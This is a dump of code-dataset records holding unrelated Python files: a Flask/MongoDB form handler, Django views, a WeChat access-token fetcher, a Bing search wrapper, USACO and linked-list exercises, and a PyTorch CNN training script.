\n\t\t\tif reg.cp == 5 and reg.week == 3:\n\t\t\t\tbeList.append(reg.be)\n\t\t\t\tmeasureList.append(reg.measure)\n\n\t\tbeList, measureList = zip(*sorted(zip(beList,measureList)))\n\t\tbes = np.array(beList)\n\t\tmeasures = np.array(measureList)\n\t\tfig = plt.figure()\n\t\tplt.plot(bes, measures)\n\t\tplt.show()\n\n\nclass Registration():\n\t# for each type of registration (with different parameters)\n\t# assign all of the information to this class\n\tdef __init__(self, regType):\n\t\treg = regType.split('_')\n\t\t# ---- BE CAREFUL HERE ----- #\n\t\tif len(reg) == 6:\n\t\t\tself.week = int(reg[1][-1])\n\t\t\tself.cp = int(reg[4][3:])\n\t\t\tself.be = np.float(reg[5][2:-4])\n\t\t\tself.sim = reg[0]\n\t\t\tself.filename = regType\n\t\t\tself.measure = self.getMeasure(regType)\n\n\tdef getMeasure(self, filename):\n\t\twith open(filename, 'r') as f:\n\t\t\treturn np.float(f.read())\n\n\ndef main():\n\n\t# Types of analysis to perform\n\tanalysisTypeList = ['sim']\n\t# Path to patient data\n\tdataPath = 'N:\\\\NiiForOptimisation'\n\t# Number of patients to analyse\n\tpt_num = ['p1', 'p2', 'p3']\n\n\t# Parameters of interest\n\tcps = [4, 5]\n\tbes = [0.005, 0.01, 0.05]\n\n\tfor aType in analysisTypeList:\n\t\tfor i in range(len(pt_num)):\n\t\t\tpat = pt_num[i]\n\t\t\tdir_name = os.path.join(dataPath, pat)\n\t\t\t# change directory to the patient directory\n\t\t\tos.chdir(dir_name)\n\t\t\t# declare the patient\n\t\t\tp = Patient(dir_name)\n\n\t\t\tif aType == 'sim':\n\t\t\t\ta = Similarity(p)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"bin/analyse_dir_validation.py","file_name":"analyse_dir_validation.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425232943","text":"'''\nProblem: clone a complex linked list (each node has an extra random pointer)\n'''\n# -*- coding:utf-8 -*-\n# class RandomListNode:\n#     def __init__(self, x):\n#         self.label = x\n#         self.next = None\n#         self.random = None\nclass Solution:\n    # returns a RandomListNode\n    def Clone(self, pHead):\n        # write code here\n        if pHead==None:\n            return None\n        #1. Duplicate each node: copying node A yields A1, and insert A1 right after A\n        node=pHead\n        while node!=None:\n            cloneNode=RandomListNode(node.label)\n            next=node.next\n            cloneNode.next=next\n            node.next=cloneNode\n            node=next\n        #2. Traverse again and copy each old node's random pointer to its clone, e.g. A1.random = A.random.next\n        node=pHead\n        while node!=None:\n            cloneNode=node.next\n            randomNode=node.random\n            if randomNode!=None:\n                cloneNode.random=randomNode.next\n            node=cloneNode.next\n        #3. Split the interleaved list into the original list and the cloned list\n        cloneHead=pHead.next\n        node=pHead\n        #First way to split: handle two nodes per step; when current is not NULL, current->next is not NULL either\n        while node!=None:\n            cloneNode=node.next\n            node.next=cloneNode.next\n            if cloneNode.next!=None:\n                cloneNode.next=cloneNode.next.next\n            node=node.next\n        return cloneHead\n\n#Second way to split: handle one node per step, while current->next is not empty\n        while node.next!=None:\n            next=node.next\n            node.next=next.next#because when node.next==None, node has no next\n            node=next\n","sub_path":"python/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122964138","text":"from collections import Counter\r\n# Python program to print a hollow \r\n# inverted pyramid pattern \r\n\r\ndef printPattern(n) : \r\n    for i in range(1,n+1) :\r\n        for j in range(1,i) :\r\n            print (\" \",end=\"\")\r\n        for j in range(1,(n * 2 - (2 * i - 1))+1):\r\n            if (i == 1 or j == 1 or j == (n * 2 - (2 * i - 1))):\r\n                print (\".\", end=\"\") \r\n            else :\r\n                print(\" \", end=\"\") \r\n        print 
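# An alternative O(n) clone of the random-pointer list using a dict from original
# node to copy -- a sketch; simpler than the in-place interleaving above, at the
# cost of O(n) extra space.
class RandomListNode:
    def __init__(self, x):
        self.label = x
        self.next = None
        self.random = None

def clone_with_map(head):
    if head is None:
        return None
    mapping = {}
    node = head
    while node:                                    # first pass: copy every node
        mapping[node] = RandomListNode(node.label)
        node = node.next
    node = head
    while node:                                    # second pass: wire next/random
        mapping[node].next = mapping.get(node.next)
        mapping[node].random = mapping.get(node.random)
        node = node.next
    return mapping[head]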
(\"\")\r\n\r\nwhile(1):\r\n k=input().split(\" \")\r\n p=int(input())\r\n k=\"\".join(k)\r\n c=Counter(k)\r\n c=c.most_common()\r\n v=c[p-1][1]\r\n printPattern(v)\r\n","sub_path":"Solutions/CODE3000 round3 solutions/Challenge 15/contest-15 c-2.py","file_name":"contest-15 c-2.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483013420","text":"import importlib\nimport logging\n\nfrom flask import flash, jsonify, redirect, render_template, request, url_for\nfrom flask_user import login_required\n\nfrom asclepios_app.custom.methods import rgetattr, rsetattr\nfrom asclepios_app.custom.fields import name_to_form\nfrom asclepios_app.custom.parse import parse_field\nfrom asclepios_app.models import *\nfrom asclepios_app.main import bp\n\n\nlogging.basicConfig(\n filename='asclepios.log',\n filemode='w',\n format='%(asctime)s.%(msecs)03d %(levelname)s:\\t%(message)s', \n level=logging.INFO, \n datefmt='%d-%b-%y %H:%M:%S')\n\n\n@bp.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n current_user.save()\n #g.search_form = SearchForm()\n\n\n@bp.route('/')\n@bp.route('/index')\n@login_required\ndef index():\n roles = current_user.roles\n if len(roles) == 1:\n if 'medical' in roles or 'nurse' in roles or 'chief_nurse' in roles or 'nurse' in roles or 'psycho' in roles:\n return redirect(url_for('medical.index'))\n if 'admin' in roles:\n return redirect(url_for('admin.index'))\n if 'doctor' in roles:\n return redirect(url_for('medical.hospitalization_doctor', idx=current_user.id))\n else:\n return render_template(\n 'index.html', \n user_id=current_user.id)\n\n\n@bp.route('/prepare_form', methods=['POST'])\ndef prepare_form():\n action = request.form['action']\n collection = request.form['collection']\n target = request.form['target']\n\n if action == 'create':\n return jsonify({'action': action,\n 'collection': collection,\n 'target': target})\n if action == 'update':\n idx = request.form['id']\n # models implemented in the MongoDB\n models = importlib.import_module('asclepios_app.models')\n Model = getattr(models, collection)\n # locate the model associated to `collection and find the corresponding document\n document = Model.objects(id=idx).first()\n\n # specific form associated to 'collection'\n form = name_to_form(collection + 'Form')()\n data = {field_form: parse_field(rgetattr(document, field_db)) for field_form, field_db in form.__form_vs_db__.items()}\n disabled_fields = form.__static_fields__\n return jsonify({'data': data,\n 'disabled_fields': disabled_fields,\n 'action': action,\n 'id': idx,\n 'collection': collection,\n 'target': target})\n return jsonify({})\n\n\n@bp.route('/process_form', methods=['POST'])\ndef process_form():\n collection = request.form['collection']\n action = request.form['action']\n\n # specific form associated to 'collection'\n form = name_to_form(collection + 'Form')()\n\n if form.validate_on_submit():\n # models implemented in the MongoDB\n models = importlib.import_module('asclepios_app.models')\n Model = getattr(models, collection)\n\n if action == 'create':\n document = Model()\n flash_text = 'El registro se creó con éxito.'\n elif action == 'update':\n idx = request.form['id']\n document = Model.objects(id=idx).first()\n flash_text = 'El registro se actualizó con éxito.'\n # initialize all the document fields\n if hasattr(Model, '__document_fields__'):\n for field, data in 
Model.__document_fields__.items():\n # get the document from the database. 'field' is the field name in the model,\n # while data['model'] is the model name referenced. data['search_field']\n # is the field by which we are going to query and data['search_data'] is the\n # data that we are going to query.\n doc_field = getattr(models, data['model']).objects(\n __raw__={data['search_field']: getattr(form, data['search_data']).data}).first()\n # we set the retrieved document to the model ReferenceField\n setattr(document, field, doc_field)\n # initialize all embedded document fields\n if hasattr(Model, '__embedded_fields__'):\n for field_name, field_obj in Model.__embedded_fields__.items():\n setattr(document, field_name, getattr(models, field_obj)())\n # initialize all the simple fields\n for field_form, field_db in form.__form_vs_db__.items():\n rsetattr(document, field_db, rgetattr(form, field_form).data)\n\n document.set_fields()\n if hasattr(document, 'autor'):\n document.set_author()\n document.save()\n flash(flash_text)\n return jsonify({})\n return jsonify({'errors': form.errors})\n","sub_path":"asclepios_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509054013","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom models import UserProfile,school,rack\nfrom django.contrib.auth.models import User\nfrom forms import SignupForm,loginForm\nfrom django.contrib.auth import authenticate\n\nfrom django.views. generic import DetailView\n\n# Create your views here.\ndef addracks(request):\n\tif request.method==\"POST\":\n\t\tr=rack(r_number=request.POST.get(\"r_number\"))\n\t\tr.save()\n\n\n\treturn render(request,\"app/addracks.html\",{\"msg\":\"created scussflly\"})\n\ndef showschool(request):\n\tsc=school.objects.all()\n\treturn render(request,\"app/showschool.html\",{\"sc\":sc})\n\n\ndef createschool(request):\n\tif request.method==\"POST\":\n\t\tsc=school(s_name=request.POST.get(\"name\"))\n\t\tsc.save()\n \n\treturn render(request,\"app/school.html\")\nclass profileDetailView(DetailView):\n\tmodel = UserProfile\n\ndef controller(request):\n\treturn render(request,\"app/controller.html\")\n\ndef userReg(request):\n\tmsg=\"\"\n\tform=SignupForm()\n\tif request.method==\"POST\":\n\t\tuser_profile=SignupForm(request.POST)\n\t\tif user_profile.is_valid():\n\t\t\tUserProfile.objects.create_user(**user_profile.cleaned_data)\n\t\t\tmsg=\"userrole created susfully\"\n\n\treturn render(request,'SignupForm.html',{\"form\":form,\"msg\":msg})\ndef login(request):\n\tmsg=\" \"\n\trequest.session['user']=None\n\tif request.method==\"POST\":\n\t\tuser=authenticate(username=request.POST.get('username'),\n\t\t\tpassword=request.POST.get('password'))\n\t\tif user:\n\t\t\tuser_profiles=UserProfile.objects.filter(user_ptr=user)\n\t\t\tif user_profiles:\n\t\t\t\tuser_profile=user_profiles[0]\n\t\t\t\trequest.session['user']={\"username\":user.username,\n\t\t\t\t\"role\":user_profile.role,\"id\":user_profile.id}\n\t\t\t\tmsg=\"created userprofile\"\n\t\t\t\treturn redirect(controller)\n\t\t\telse:\n\t\t\t\tmsg=\"User profile is not created \"\n\t\telse:\n\t\t\tmsg=\"login failed\"\n\treturn 
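# The dotted-path helpers imported from asclepios_app.custom.methods are not shown
# in this file; a plausible minimal implementation, stated as an assumption, would be:
import functools

def rgetattr(obj, path, *default):
    # rgetattr(doc, 'a.b.c') -> doc.a.b.c
    return functools.reduce(lambda o, name: getattr(o, name, *default), path.split('.'), obj)

def rsetattr(obj, path, value):
    # rsetattr(doc, 'a.b.c', v) performs doc.a.b.c = v
    head, _, last = path.rpartition('.')
    setattr(rgetattr(obj, head) if head else obj, last, value)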
render(request,\"app/login.html\",{\"msg\":msg})\n\n\n","sub_path":"schoolmanagement/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178902625","text":"\"\"\"Backup FILE to an embedded file inside FILE.\"\"\"\n\nimport logging\nimport os\nimport os.path\nimport shutil\nimport ebmeta\n\nlog = logging.getLogger('backup')\n\ndef run():\n \"\"\"Run this action.\"\"\"\n\n path = ebmeta.arguments.filename\n abspath = os.path.abspath(path)\n folder = os.path.dirname(abspath)\n\n backup_folder = os.path.join(folder, \".backup\")\n backup_path = os.path.join(\n backup_folder, os.path.basename(path) + \".backup\"\n )\n\n if os.path.exists(backup_path):\n log.debug(\"Skipping backup because a backup was found in \\\"{}\\\".\".format(backup_path))\n return\n\n if not os.path.exists(backup_folder): os.mkdir(backup_folder)\n\n shutil.copy2(abspath, backup_path)\n log.debug(\"Wrote backup file to \\\"{}\\\".\".format(backup_path))\n","sub_path":"ebmeta/actions/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481647581","text":"import speech_recognition as sr\n\nr=sr.Recognizer()\n\ns=''\nwhile s.lower()!='bye':\n\twith sr.Microphone() as source:\n\t\tprint('Say something!')\n\t\taudio=r.listen(source)\n\ttry:\n\t\ts=r.recognize_google(audio)\n\t\tprint('I think you said ' + s)\n\texcept sr.UnknownValueError:\n\t\tprint('Sorry, try again!')\n\texcept sr.RequestError as e:\n\t\tprint('Could not request results from Google Speech Recognition service; {0}'.format(e))\nprint('Have a nice day!')\n","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234806070","text":"from csv_comparison_package import Compare\nfrom csv_comparison_package import Field\nfrom csv_comparison_package import AppErrorHandler\n\n\ndef validate_index_identity(comparable_a: Compare, comparable_b: Compare):\n comparable_a_index_name = comparable_a.index_column_name[0][\n Field.column_name.value] # not supporting multi index\n comparable_b_index_name = comparable_b.index_column_name[0][Field.column_name.value]\n df_a = list(comparable_a.data_frame[comparable_a_index_name])\n df_b = list(comparable_b.data_frame[comparable_b_index_name])\n is_a_in_b = [val in df_b for val in df_a]\n\n if not all(is_a_in_b):\n raise AppErrorHandler(AppErrorHandler.invalid_index_list)\n","sub_path":"csv_comparison_package/cell_comparator/__validate_index_identity.py","file_name":"__validate_index_identity.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"143741122","text":"import json\nimport urllib.parse, urllib.request, urllib.error\n#import poll.keys as keys\nBING_API_KEY = '9f539be65a4c4253807c79b0a38f74d1'\n\nimport requests\n\ndef bing_search(query):\n results=[]\n url = 'https://api.cognitive.microsoft.com/bing/v5.0/search'\n # query string parameters\n payload = {'q': query}\n # custom headers\n headers = {'Ocp-Apim-Subscription-Key': BING_API_KEY}\n # make GET request\n r = requests.get(url, params=payload, headers=headers)\n # get JSON response\n j = r.json()\n\n for result in j['webPages']['value']:\n results.append({\n 'title': result['name'],\n 
'link': result['url'],\n 'summary': result['snippet']})\n\n print(results)\n return results\n\nif __name__ == '__main__':\n bing_search('good news')","sub_path":"poll/bing_search.py","file_name":"bing_search.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419395937","text":"\"\"\"\r\nID: kqanto1\r\nLANG: PYTHON3\r\nTASK: namenum\r\n\"\"\"\r\nd = {'A':2, 'B':2, 'C':2, 'D':3, 'E':3, 'F':3, 'G':4, 'H':4, 'I':4, 'J':5, 'K':5, 'L':5,\r\n 'M':6, 'N':6, 'O':6, 'P':7, 'R':7, 'S':7, 'T':8, 'U':8, 'V':8, 'W':9, 'X':9, 'Y':9}\r\n\r\nnames = []\r\nnamesn = []\r\nwith open(\"namenum.in\", 'r') as f:\r\n n = int(f.readline())\r\nwith open('dict.txt', 'r') as f:\r\n for i in range(4617):\r\n k = f.readline().split()[0]\r\n if not('Q' in k or 'Z' in k):\r\n names.append(k)\r\nfor i in range(len(names)):\r\n tmp = list(names[i])\r\n for j in range(len(tmp)):\r\n tmp[j] = d[tmp[j]]\r\n namesn.append(int(''.join(map(str,tmp))))\r\nfind = True\r\nwith open(\"namenum.out\", 'w+') as f:\r\n for i in range(len(names)):\r\n if n == namesn[i]:\r\n f.write(f\"{names[i]}\\n\")\r\n find = False\r\n if find:\r\n f.write(f\"NONE\\n\")\r\n\r\n\r\n","sub_path":"usaco/1.3/namenum.py","file_name":"namenum.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453311865","text":"\"\"\"Test the LTI interconnection with Open edX.\"\"\"\n\nfrom django.shortcuts import render\nfrom django.test import RequestFactory, TestCase\n\n\n# We don't enforce arguments documentation in tests\n# pylint: disable=missing-param-doc,missing-type-doc,unused-argument\n\n\nclass VideoLTITemplatesTestCase(TestCase):\n \"\"\"Test the LTI provider endpoint to upload and view videos.\"\"\"\n\n def test_lti_video_launch_request_render_context(self):\n \"\"\"The context should be rendered to html on the launch request page.\"\"\"\n request = RequestFactory().get(\"/\")\n\n video = {\"a\": 1, \"b\": 2}\n response = render(\n request,\n \"core/lti_video.html\",\n {\n \"video\": video,\n \"state\": \"s\",\n \"resource_link_id\": \"rli\",\n \"jwt_token\": \"jwt\",\n },\n )\n self.assertContains(\n response,\n (\n '
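# The USACO letter-to-digit mapping above, applied in the forward direction -- a
# sketch converting a name straight to its number, without the dictionary-file I/O.
d = {'A': 2, 'B': 2, 'C': 2, 'D': 3, 'E': 3, 'F': 3, 'G': 4, 'H': 4, 'I': 4,
     'J': 5, 'K': 5, 'L': 5, 'M': 6, 'N': 6, 'O': 6, 'P': 7, 'R': 7, 'S': 7,
     'T': 8, 'U': 8, 'V': 8, 'W': 9, 'X': 9, 'Y': 9}

def name_to_number(name):
    return int(''.join(str(d[ch]) for ch in name))

print(name_to_number('GREG'))  # 4734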
    '\n ),\n html=True,\n )\n self.assertContains(\n response,\n '
    ',\n            html=True,\n        )\n","sub_path":"marsha/core/tests/test_templates_lti_video.py","file_name":"test_templates_lti_video.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651178654","text":"# -*- coding: utf-8 -*-\n\nimport time\n\nfrom pywe_exception import WeChatException\n\nfrom .basetoken import BaseToken\n\n\nclass Token(BaseToken):\n    def __init__(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n        super(Token, self).__init__(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n        # Fetch the access token, Refer: https://mp.weixin.qq.com/wiki?t=resource/res_main&id=mp1421140183\n        # Daily real-time call quota: 100,000 requests\n        # Refreshing every 10 minutes gives an expected 24 * 60 / 10 = 144 refreshes per day\n        self.WECHAT_ACCESS_TOKEN = self.API_DOMAIN + '/cgi-bin/token?grant_type=client_credential&appid={appid}&secret={secret}'\n\n    def __about_to_expires(self, expires_at, refresh_left_seconds=6600):\n        return expires_at and expires_at - int(time.time()) < refresh_left_seconds\n\n    def __fetch_access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n        # Update Params\n        self.update_params(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n        # Access Info Request\n        access_info = self.get(self.WECHAT_ACCESS_TOKEN, appid=self.appid, secret=self.secret)\n        # Request Error\n        if 'expires_in' not in access_info:\n            raise WeChatException(access_info)\n        # Set Access Info into Storage\n        expires_in = access_info.get('expires_in')\n        access_info['expires_at'] = int(time.time()) + expires_in\n        self.storage.set(self.access_info_key, access_info, expires_in)\n        # If token_fetched_func, Call it with `appid`, `secret`, `access_info`\n        if token_fetched_func:\n            token_fetched_func(self.appid, self.secret, access_info)\n        # Return Access Token\n        return access_info.get('access_token')\n\n    def access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n        # Update Params\n        self.update_params(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n        # Fetch access_info\n        access_info = self.storage.get(self.access_info_key)\n        if access_info:\n            access_token = access_info.get('access_token')\n            if access_token and not self.__about_to_expires(access_info.get('expires_at'), refresh_left_seconds=refresh_left_seconds):\n                return access_token\n        return self.__fetch_access_token(self.appid, self.secret, self.storage, token_fetched_func=self.token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n\n    def refresh_access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n        return self.__fetch_access_token(appid, secret, storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n\n    def final_access_token(self, cls=None, appid=None, secret=None, token=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n        return token or self.access_token(appid or cls.appid, secret or cls.secret, storage=storage or cls.storage, token_fetched_func=token_fetched_func or cls.token_fetched_func, refresh_left_seconds=refresh_left_seconds or cls.refresh_left_seconds)\n\n\ntoken = Token()\naccess_token = token.access_token\nrefresh_access_token = 
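# The refresh-ahead check at the heart of Token above, isolated -- a sketch; the
# dict layout mirrors the access_info record that __fetch_access_token stores.
import time

def needs_refresh(access_info, refresh_left_seconds=6600):
    # treat the token as stale once fewer than refresh_left_seconds remain, so
    # callers refresh well before WeChat's real 7200-second expiry
    expires_at = access_info.get('expires_at')
    return not expires_at or expires_at - int(time.time()) < refresh_left_seconds

print(needs_refresh({'expires_at': int(time.time()) + 7200}))  # False: plenty left
print(needs_refresh({'expires_at': int(time.time()) + 600}))   # True: refresh now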
token.refresh_access_token\nfinal_access_token = token.final_access_token\n","sub_path":"pywe_token/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"301705375","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" # noqa\nfrom pipeline.service.pipeline_engine_adapter.adapter_api import run_pipeline\nfrom pipeline.parser.pipeline_parser import PipelineParser, WebPipelineAdapter\nfrom pipeline.utils.uniqid import uniqid, node_uniqid\nfrom .new_data_for_test import (\n PIPELINE_DATA,\n WEB_PIPELINE_WITH_SUB_PROCESS2\n)\n\n\ndef test_run_serial_pipeline():\n pipeline = PIPELINE_DATA\n parser_obj = PipelineParser(pipeline)\n run_pipeline(parser_obj.parser())\n\n\ndef test_run_sub_pipeline2():\n pipeline = WEB_PIPELINE_WITH_SUB_PROCESS2\n parser_obj = WebPipelineAdapter(pipeline)\n run_pipeline(parser_obj.parser())\n\n\ndef main_test():\n id_list = [node_uniqid() for i in xrange(100)]\n pipe1 = {\n 'id': id_list[0],\n 'name': 'name',\n 'start_event': {\n 'id': id_list[1],\n 'name': 'start',\n 'type': 'EmptyStartEvent',\n 'incoming': None,\n 'outgoing': id_list[2]\n },\n 'end_event': {\n 'id': id_list[53],\n 'name': 'end',\n 'type': 'EmptyEndEvent',\n 'incoming': id_list[52],\n 'outgoing': None\n },\n 'activities': {\n },\n 'flows': { # 存放该 Pipeline 中所有的线\n },\n 'gateways': { # 这里存放着网关的详细信息\n },\n 'data': {\n 'inputs': {\n },\n 'outputs': {\n },\n }\n }\n for i in xrange(2, 51, 2):\n pipe1['flows'][id_list[i]] = {\n 'id': id_list[i],\n 'source': id_list[i - 1],\n 'target': id_list[i + 1]\n }\n pipe1['activities'][id_list[i + 1]] = {\n 'id': id_list[i + 1],\n 'type': 'ServiceActivity',\n 'name': 'first_task',\n 'incoming': id_list[i],\n 'outgoing': id_list[i + 2],\n 'component': {\n 'code': 'demo',\n 'inputs': {\n 'input_test': {\n 'type': 'plain',\n 'value': '2',\n },\n 'radio_test': {\n 'type': 'plain',\n 'value': '1',\n },\n },\n }\n }\n pipe1['flows'][id_list[52]] = {\n 'id': id_list[52],\n 'source': id_list[52 - 1],\n 'target': id_list[52 + 1]\n }\n parser_obj = PipelineParser(pipe1)\n run_pipeline(parser_obj.parser())\n","sub_path":"pipeline/tests/pipeline_parser/manual_test_run_parsed_pipeline.py","file_name":"manual_test_run_parsed_pipeline.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142320443","text":"\"\"\"\n读写JSON文件\n@Date 2020.04.11\n\"\"\"\n# JSON模块上主要有四个比较重要的函数,分别是\n# dump - 将Python对象按照JSON格式序列化到文件中\n# dumps - 将Python对象处理成JSON格式的字符串\n# load - 将文件中的JSON数据反序列化成对象\n# loads - 将字符串的内容反序列化成Python对象\nimport json\n\n\ndef main():\n # 定义字典对象\n mydict = {\n 'name': 'zyj',\n 'age': 20,\n 'qq': 1836686674,\n 'friends': ['Yong', 'xin'],\n 'cars': [\n {'brand': '迈巴赫', 
'max_speed': '350'},\n {'brand': ' 布加迪威龙', 'max_speed': '430'}\n ]\n }\n try:\n # 将字典对象序列化到文件\n with open('./res/zyj.json', 'w', encoding='utf-8') as fs:\n json.dump(mydict, fs)\n except IOError as e:\n print(e)\n print('保存数据完成!')\n\n try:\n # 从文件中读入,反序列化成对象\n with open('./res/zyj.json', 'r', encoding='utf-8') as fs:\n mydict = json.load(fs)\n print(mydict)\n\n except FileNotFoundError as e:\n print(e)\n except IOError as e:\n print(e)\n print('保存数据完成!')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"基本语法/Day17/读写json文件.py","file_name":"读写json文件.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124697134","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 4 19:46:38 2020\n\n@author: Jonathan\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 1 09:11:23 2020\n\n@author: Jonathan\n\"\"\"\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom torch import nn, optim\n#import torch.nn.functional as F\nfrom torch.utils.data import DataLoader,TensorDataset\n#from torch.utils.data.dataset import Dataset\n#from torchvision import transforms\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\n\nbatchSize=100 \nepochNum=1\nlearningRate = 0.001 \n\nfile= open(\"result.txt\", \"a+\")\n#class MyDataSet(Dataset):\n# def __init__(self, data,labels,transform=None,targetTransform=None):\n# self.data = data\n# self.labels=labels\n# self.transform = transform\n# \n# def __len__(self):\n# return len(self.data)\n# \n# def __getitem__(self,index):\n# if torch.is_tensor(index):\n# index = index.tolist()\n# data=self.data[index]\n# labels=self.labels[index]\n# if self.transform is not None:\n# data = self.transform(data)\n# if self.targetTransform is not None:\n# labels = self.transform(labels)\n# return data, labels\n\n\ntrainData=pd.read_csv('trainData.csv')\ntarget = trainData['class']\ndel trainData['class']\ntrainSet = TensorDataset(torch.Tensor(np.array(trainData)), torch.Tensor(np.array(target)))\n\ntestData=pd.read_csv('testData.csv')\ntarget = testData['class']\ndel testData['class']\ntestSet = TensorDataset(torch.Tensor(np.array(testData)), torch.Tensor(np.array(target)))\n#trainSet=MyDataSet(trainData.drop('class', axis=1),trainData['class'])\n#testSet=MyDataSet(testData.drop('class', axis=1),testData['class'])\n\ntrainLoader = DataLoader(trainSet, batch_size=batchSize, shuffle=True)\ntestLoader = DataLoader(testSet, batch_size=batchSize, shuffle=False)\n\n\n\n#class Cnn(nn.Module):\n# def __init__(self,inDim,outDim):\n# super(Cnn,self).__init__()\n# self.conv1 = nn.Conv2d(inDim, 6, 5, 1, 2)\n# self.pool = nn.MaxPool2d(2, 2)\n# self.conv2 = nn.Conv2d(6, 16, 5, 1, 0)\n# self.fc1 = nn.Linear(400, 120)\n# self.fc2 = nn.Linear(120, 84)\n# self.fc3 = nn.Linear(84, outDim)\n#\n# def forward(self, x):\n# x = self.pool(F.relu(self.conv1(x)))\n# x = self.pool(F.relu(self.conv2(x)))\n# x = x.view(-1, 16 * 5 * 5)\n# x = F.relu(self.fc1(x))\n# x = F.relu(self.fc2(x))\n# x = self.fc3(x)\n# return x\nclass Cnn(nn.Module):\n def __init__(self, inDim, outDim):\n super(Cnn, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(inDim, 24, 3, stride=1, padding=2),\n nn.BatchNorm2d(24),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(24, 48, 3, stride=1, padding=0),\n nn.BatchNorm2d(48),\n nn.ReLU(True), \n nn.MaxPool2d(2, 2),\n nn.Dropout(0.5)\n )\n\n self.fc = nn.Sequential(\n nn.Linear(1728,outDim))\n\n def forward(self, x):\n 
out = self.conv(x)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\n\nDEVICE='cuda' if torch.cuda.is_available() else 'cpu'\n\nmodel=torch.load('model_24_48_0.6_2')\nmodel=model.to(DEVICE)\n\noptimizer = optim.Adam(params=model.parameters(),betas=(0.9, 0.999), lr=learningRate)\ncriterion = nn.CrossEntropyLoss()\n\nlossMin=1\ntrainLossPlot=[]\ntrainAccPlot=[]\nlossPlot=[]\naccPlot=[]\n\nfor epoch in range(epochNum):\n model.train()\n runningLoss = 0.0\n runningAcc=0.0\n print('epoch {}'.format(epoch + 1))\n print('=' * 10)\n# \n# for data in trainLoader:\n# # get the inputs; data is a list of [inputs, labels]\n# inputs, labels = data\n# labels=labels.long()\n# inputs=inputs.view(batchSize,1,28,28)\n# inputs=inputs.to(DEVICE)\n# labels=labels.to(DEVICE)\n#\n# # zero the parameter gradients\n# optimizer.zero_grad()\n#\n# # forward + backward + optimize\n# outputs = model(inputs)\n# loss = criterion(outputs, labels)\n# loss.backward()\n# optimizer.step()\n#\n# # print statistics\n# runningLoss += loss.item()\n# \n# _, pred = torch.max(outputs, 1)\n# numCorrect = (pred == labels).sum()\n# runningAcc += numCorrect.item()\n# \n# 